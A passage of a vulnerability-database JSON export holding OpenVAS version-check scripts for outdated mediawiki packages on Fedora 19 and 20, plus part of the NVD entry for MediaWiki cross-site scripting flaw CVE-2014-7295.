exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.7~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-12-30T00:00:00", "id": "OPENVAS:1361412562310868638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868638", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-17264", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-17264\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-30 05:56:21 +0100 (Tue, 30 Dec 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-17264\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17264\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147179.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "Check the version of mediawiki", "modified": "2019-03-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310868400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868400", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-12262", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-12262\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868400\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:02:20 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-12262\");\n script_tag(name:\"summary\", value:\"Check the version of mediawiki\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12262\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140819.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.5~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-04-19T00:00:00", "id": "OPENVAS:1361412562310869260", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869260", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2015-5569", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2015-5569\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869260\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:55:37 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2014-7295\", \"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\",\n \"CVE-2013-6451\", \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for mediawiki FEDORA-2015-5569\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-5569\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.23.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-07-07T00:00:00", "id": "OPENVAS:1361412562310867951", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867951", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-7805", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-7805\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867951\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-07 12:36:02 +0530 (Mon, 07 Jul 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-7805\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7805\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-July/135086.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.11~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-17T00:00:00", "id": "OPENVAS:1361412562310867892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867892", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-6961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-6961\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867892\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 10:01:26 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-6961\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6961\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134116.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.10~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2020-02-04T00:00:00", "published": "2014-05-12T00:00:00", "id": "OPENVAS:1361412562310867776", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867776", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5691\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867776\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:10:21 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5691\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-04T18:49:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6472", "CVE-2013-6452", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451"], "description": "The remote host is missing an update for the ", "modified": "2020-02-04T00:00:00", "published": "2014-05-12T00:00:00", "id": "OPENVAS:1361412562310867788", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867788", "type": "openvas", "title": "Fedora Update for mediawiki FEDORA-2014-5684", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-5684\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867788\");\n script_version(\"2020-02-04T09:04:16+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-04 09:04:16 +0000 (Tue, 04 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-12 09:11:11 +0530 (Mon, 12 May 2014)\");\n script_cve_id(\"CVE-2014-2853\", \"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\",\n \"CVE-2013-6454\", \"CVE-2013-6453\", \"CVE-2013-6472\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-5684\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5684\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T19:58:27", "description": "The (1) Special:Preferences and (2) Special:UserLogin pages in MediaWiki before 1.19.20, 1.22.x before 1.22.12 and 1.23.x before 1.23.5 allow remote authenticated users to conduct cross-site scripting (XSS) attacks or have unspecified other impact via crafted CSS, as demonstrated by modifying MediaWiki:Common.css.", "edition": 5, "cvss3": {}, "published": "2014-10-07T14:55:00", "title": "CVE-2014-7295", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7295"], "modified": "2015-08-06T16:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.23.3", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.23.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.23.2", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.23.0", 
"cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.19", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.18", "cpe:/a:mediawiki:mediawiki:1.22.11", "cpe:/a:mediawiki:mediawiki:1.22.10", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.22.9", "cpe:/a:mediawiki:mediawiki:1.19.14"], "id": "CVE-2014-7295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7295", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", 